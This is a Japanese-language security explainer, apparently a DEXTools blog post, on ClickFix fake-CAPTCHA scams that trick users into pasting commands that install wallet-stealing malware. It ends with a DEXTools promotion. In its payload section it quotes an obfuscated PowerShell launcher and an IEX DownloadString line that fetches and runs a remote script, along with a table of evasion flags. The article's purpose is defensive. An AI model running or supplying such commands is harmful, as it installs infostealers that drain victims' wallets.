ClickFix 暗号詐欺: ウォレットを盗む偽の CAPTCHA

フィッシングは、基本的な偽のログイン ページを超えて進化しています。 ClickFix 暗号流出攻撃の背後にあるソーシャル エンジニアリングと端末実行の仕組みを詳しく分析します。
偽の CAPTCHA と ClickFix 暗号ウォレットの盗難
- の登場 ClickFix 暗号詐欺 は、これらの従来のメンタル ファイアウォールを完全にバイパスします。 ClickFix 攻撃は、ユーザーをだまして悪意のあるオンチェーン トランザクションに署名させたり、フィッシング フォームに秘密キーを入力させたりするのではなく、ユーザーとローカル オペレーティング システムの間の操作上の関係を悪用します。これらの攻撃は、非常に説得力のある人為的なブラウザ エラーと偽の CAPTCHA 検証画面を演出することにより、ユーザーをだまして暗号化されたスクリプトをローカル システム端末に直接コピーアンドペーストさせます。
- デジタル資産の盗難を支配するベクトルは、受動的な欺瞞から、ユーザーによる積極的な端末悪用へと移行しています。何年もの間、基本的な防御マニュアルは、 分散型金融 (DeFi) の参加者は、偽のログイン ページの傍受、スマート コントラクトの承認署名の監査、悪意のある入力に対する生のシード フレーズの保護に重点を置きました。アロケーターが URL を検証し、ハードウェアウォレットの確認画面を注意深くチェックする規律ある習慣を維持していれば、彼らのオンチェーン資本は構造的に隔離されたままでした。
- Web ブラウザは失敗しませんでした。被害者の警戒心は圧力によるものだった。このガイドでは、ClickFix アーキテクチャを定義するソーシャル エンジニアリングのトリック、コマンドラインの仕組み、抽出ループについて詳しく説明します。

1. トラップの心理学: 偽の CAPTCHA インターフェイス
- ClickFix 攻撃を技術的な精度で分析するには、まずそれが純粋なソーシャル エンジニアリングの遊びとして始まることを認識する必要があります。この攻撃は通常、ユーザーが侵害された Web3 ブログ、複製されたプロトコル フロントエンド、または偽の追跡ポータルにアクセスしたときに発生します。
このページは、明らかなウォレット接続プロンプトを表示する代わりに、即時に機械的なロードブロッキングをトリガーします。
- 画面には、Cloudflare の Turnstile、Google reCAPTCHA v3 ループ、または重大なブラウザ更新失敗アラート (例: 「Chrome Update Error: Direct3D Ingestion Failure」) などの標準セキュリティ チェックを模倣した、高度に洗練された対話型ウィンドウが表示されます。
- ユーザーがチェックを完了しようとすると、インターフェイスは、局所的なレンダリングの競合により自動検証が失敗したことを示す対象通知をフラッシュします。次に、画面に段階的な「手動修正」が表示されます。
- この詐欺は、緊急の技術的問題をでっち上げることにより、被害者の心理状態を防御的な消費者からトラブルシューティングの技術者に変え、異常なコンピューター コマンドに従おうとするようにさせます。
2. コマンド実行パイプライン: クリップボードからターミナルまで
- ClickFix 手法の本当の危険性は、ブラウザ レベルのサンドボックス セキュリティを完全にバイパスする機能にあります。 Web ブラウザは、信頼できないインターネット コードがコンピュータのハードウェアを直接操作したり、バックグラウンドでソフトウェア アプリケーションを実行したりすることを防ぐように設計されています。
- ClickFix はトリックによってこの障壁を回避します ユーザー は、悪意のあるソフトウェアをブラウザのセキュリティ ウォールを直接通過させるブリッジとして機能します。
段階的な射出メカニズム
ステップ 1: クリップボードのハイジャック: 偽の検証ポップアップは、「修正コードのコピー」または「検証トークンのコピー」というラベルの付いたボタンをクリックするようにユーザーに指示します。クリックすると、Web サイトの JavaScript が、隠された悪意のあるコマンド文字列をユーザーのシステム クリップボードに直接コピーします。
ステップ 2: ターミナル取り込みのショートカット: インターフェイスには、オペレーティング システムのネイティブ コマンド ユーティリティを開くようにユーザーに指示する明確なグラフィック指示が表示されます。 Windows ユーザーの場合は、 を押すように指示されます。
Windows Key + R「実行」ウィンドウを呼び出すには、次のように入力します。cmdまたはpowershellと入力し、Enter キーを押します。 macOS ユーザーの場合は、Spotlight 検索経由でネイティブ ターミナル アプリケーションを開くように指示されます。ステップ 3: 貼り付けトリガー: この指示では、開いているターミナル ウィンドウ内で右クリックするか、キーを押すようにユーザーに指示されます。
Ctrl + V(またはCmd + V(Mac の場合))、「コピーした検証文字列」を貼り付け、実行を押します。
3. ペイロードの分解: Base64 PowerShell エクスプロイト
被害者がコピーした文字列を端末に貼り付けるとき、無害な検証キーを貼り付けるわけではありません。これらは、サイレント ダウンロード ループをアクティブにするために設計された、高度に圧縮され、難読化され、Base64 でエンコードされたコマンド文字列を頻繁に実行します。
Windows システムを対象とした一般的な ClickFix コマンド ペイロードは、標準の PowerShell ユーティリティ ツールを利用して、リモート サーバーから第 2 段階のマルウェア ファイルをプルダウンします。
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc [Base64_Obfuscateシステムによってデコードされると、このバックグラウンド コマンドは積極的な自動ダウンロード スクリプトに変換されます。
IEX (New-Object Net.WebClient).DownloadString('https://malicious-distribution-node.cdn/payload.ps1')
システムエクスプロイトマトリックス
| 端末パラメータ | システムコンプライアンスの目的 | 悪意のある悪用の目的 |
-NoP (プロフィールなし) | 端末がパーソナライズされたユーザープロファイルをロードできないようにします。 | 実行速度を高速化し、ローカライズされたプロファイル アラートをバイパスします。 |
-NonI (非インタラクティブ) | 対話型プロンプトまたは確認メッセージを無効にします。 | ユーザー入力を必要とせずに、スクリプトがバックグラウンドで完全に実行されることを保証します。 |
-W Hidden (WindowStyle 非表示) | ターミナルの実行を強制的に非表示状態で実行します。 | 被害者に警告しないように、デスクトップ ビューからダウンロード アクティビティを隠します。 |
-Exec Bypass | デフォルトのシステム実行制限をオーバーライドします。 | 不正なスクリプトの実行を防ぐセキュリティ構成を明示的に無効にします。 |
IEX (式の呼び出し) | 任意の文字列式を評価し、ローカル コマンドとして実行します。 | ウォレットを盗むペイロードを即座にダウンロードし、アクティブ メモリに直接実行します。 |
4. 何が盗まれるか: ウォレット Infostealer ペイロード
- 第 2 段階のペイロードがシステム メモリ内で実行されると、 情報窃取者 (Infostealer)、Lumma Stealer、Vidar、Medusa など。このマルウェアは、一般的なドキュメントや検索履歴をターゲットにしません。デジタル資産のフットプリントを襲撃するように精密に設計されています。
- Infostealer は、Web ブラウザが拡張機能とアプリケーション状態ファイルを保存するローカル フォルダー ディレクトリをプログラムでターゲットにします。積極的にこすり落とします
.ldbと.logMetaMask、Phantom、Coinbase Wallet、Rabby などの人気のある Web3 拡張機能に属するデータ マップ。
これらのローカル ファイルには、暗号化されたウォレット ボルト キーが格納されます。対称的に、マルウェアはブラウザーの Cookie とアクティブなセッション トークンを抽出します。
- このスクレイピングされたデータはすべて圧縮アーカイブにパックされ、暗号化されたチャネルを介して攻撃者のサーバーに即座に送信されます。ハッカーがこれらのセッション トークンとローカル ボールトを所有すると、オフラインでウォレットのパスワードを総当たり攻撃したり、アクティブなセッションをハイジャックしたりして、数分以内にマルチチェーン ポートフォリオ全体のすべての資産を使い果たします。
5. 従来のセキュリティ保護が失敗する理由
ClickFix 暗号詐欺が高い成功率を達成する主な理由は、標準のウイルス対策ツールや Web ブラウザ拡張機能を組織的にバイパスするためです。
構造的なセキュリティの抜け穴: 悪意のある Web サイトは物理的にファイルのダウンロードを強制しないため、
.exeまたは.dmgファイルが標準のブラウザ チャネル経由で送信される場合、ブラウザ防御システムにはまったくリスクがありません。ユーザーはテキストをコピーし、システム端末を手動で開きます。
オペレーティング システムの観点から見ると、PowerShell またはターミナルを開いて管理コマンドを実行することは、コンピューターの所有者によって明示的に許可された日常的な特権アクティビティです。コードは多くの場合、重い未検証の実行可能ファイルをローカル ハード ドライブに保存せずにアクティブ メモリ内で直接実行されるため、基本的なシグネチャ ベースのウイルス対策ソフトウェアは、データ抽出ループが完了するまでアクティビティにフラグを立てられないことがよくあります。
6. オンチェーン保護戦略と DEXTools によるテレメトリ
- 最新のソーシャル エンジニアリングの脅威から身を守るには、ライブのオンチェーンの動きをリアルタイムで可視化するとともに、システム端末の周囲に厳格な境界を維持する必要があります。潜在的なローカル情報窃取者の侵害によって資産構成が侵害されたと疑われる場合、アクティブなウォレットのデータログを追跡し、分散型会場での未処理の契約許可を監査することが、残りの資本を保存する唯一の方法です。
- DEXTools は、複数のレイヤー 1 およびレイヤー 2 ネットワークにわたるトークンのアクティビティとウォレットの安定性を監視するために必要な重要な分析データ インフラストラクチャを提供します。リアルタイムのペアエクスプローラー、マルチチェーントランザクション追跡、トークンコントラクトのセキュリティ監査を活用することで、市場参加者は予期せぬウォレットのやり取りや不審な資金移動がオンチェーン上で発生していないかどうかを独立して検証できます。
DEXTools にアクセスできます はこちら さあ、今日から取引を始めましょう!
ウォレット ドレイナー攻撃の説明: 認識して回避する方法 ウォレットのセキュリティ チェックリスト: 保有する前に行うべき 10 のステップ 2026 年のトップ トークン セキュリティ ツール: 詐欺チェック、監査、リスク レビュー TON ウォレット ドレイナー詐欺: 安全を保つ方法免責事項: この記事は情報提供のみを目的としており、投資アドバイス、財務アドバイス、取引アドバイス、またはその他の種類のアドバイスを構成するものではありません。 DEXTools は、暗号通貨やトークンの購入、販売、または保有を推奨しません。ユーザーは、投資に関する決定を下す前に、自分で調査を行い、資格のある財務アドバイザーに相談する必要があります。暗号通貨への投資は不安定でリスクが高くなります。 DEXTools は、発生した損失に対して責任を負いません。